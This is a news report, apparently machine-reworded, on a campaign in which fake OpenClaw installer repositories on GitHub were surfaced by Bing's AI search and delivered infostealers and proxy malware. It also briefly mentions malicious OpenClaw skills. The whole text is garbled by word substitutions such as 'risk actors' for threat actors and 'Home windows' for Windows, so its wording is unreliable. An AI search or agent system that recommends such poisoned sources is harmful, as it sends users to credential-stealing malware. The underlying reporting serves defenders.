Faux OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing’s AI-enhanced search function instructed customers to run instructions that deployed info stealers and proxy malware.
OpenClaw is an open-source AI agent that gained reputation as a private assistant able to executing duties. It has entry to native information and might combine with e mail, messaging apps, and on-line providers.
As a consequence of its widespread native entry, risk actors noticed a possibility to gather delicate info by publishing malicious expertise (instruction information) on the software’s official registry and GitHub.
Researchers at managed detection and response firm Huntress found a brand new marketing campaign final month that unfold a number of executables for malware loaders and infostealers to customers seeking to set up OpenClaw.
Based on the researchers, the risk actor arrange malicious GitHub repositories posing as OpenClaw installers, which have been beneficial by Bing in its AI-powered search outcomes for the Home windows model of the software.
Supply: Huntress
Bing AI’s recommended obtain hyperlink within the picture above factors to a malicious OpenClaw installer on GitHub, Huntress researchers stated in a report.
The researchers say that “simply internet hosting the malware on GitHub was sufficient to poison Bing AI search outcomes.”
A pretend OpenClaw repository that Huntress analyzed appeared reliable at a fast look, because the risk actor tied it to a GitHub group named openclaw-installer. This may occasionally even have carried some weight in Bing’s AI advice.
The GitHub accounts publishing these repositories have been newly created, however tried to extend their legitimacy by copying actual code from the Cloudflare moltworker undertaking.
Supply: Huntress
Nevertheless, the repository supplied an set up information for OpenClaw on macOS, instructing the person to stick a bash command in Terminal. This could attain a separate GitHub group referred to as puppeteerrr and a repository named dmg.
“The repository contained quite a few information that adopted a theme of containing a shell script paired with a Mach-O executable,” which Huntress recognized because the Atomic Stealer malware.
Ssupply: Huntress
For Home windows customers, the risk actor used the pretend repositories to ship OpenClaw_x64.exe, which deployed a number of malicious executables. Huntress says that the Home windows Managed AV and Managed Defender for Endpoint options quarantined the information on the client’s machine that they analyzed.
A lot of the executables have been Rust-based malware loaders that executed info stealers in reminiscence, the researchers stated, including that one of many payloads was Vidar stealer that contacted Telegram and Steam person profiles to get command-and-control (C2) knowledge.
One other Home windows executable delivered this fashion was the GhostSocks backconnect proxy malware, designed to transform customers’ machines right into a proxy node.
An attacker can use the system to entry accounts with credentials stolen from the machine, thus bypassing anti-fraud checks. Risk actors additionally use proxy nodes to route malicious visitors or to cover their tracks in assaults.
Whereas investigating, Huntress recognized a number of accounts and repositories utilized in the identical marketing campaign, which delivered malware to customers searching for OpenClaw installers.
The entire malicious repositories have been reported to GitHub, although it’s unclear if they’ve been eliminated by now.
The official OpenClaw repository on GitHub is right here. It’s endorsed to bookmark the official portals of the software program you’re utilizing as an alternative of looking on-line every time.
Malware is getting smarter. The Crimson Report 2026 reveals how new threats use math to detect sandboxes and conceal in plain sight.
Obtain our evaluation of 1.1 million malicious samples to uncover the highest 10 methods and see in case your safety stack is blinded.
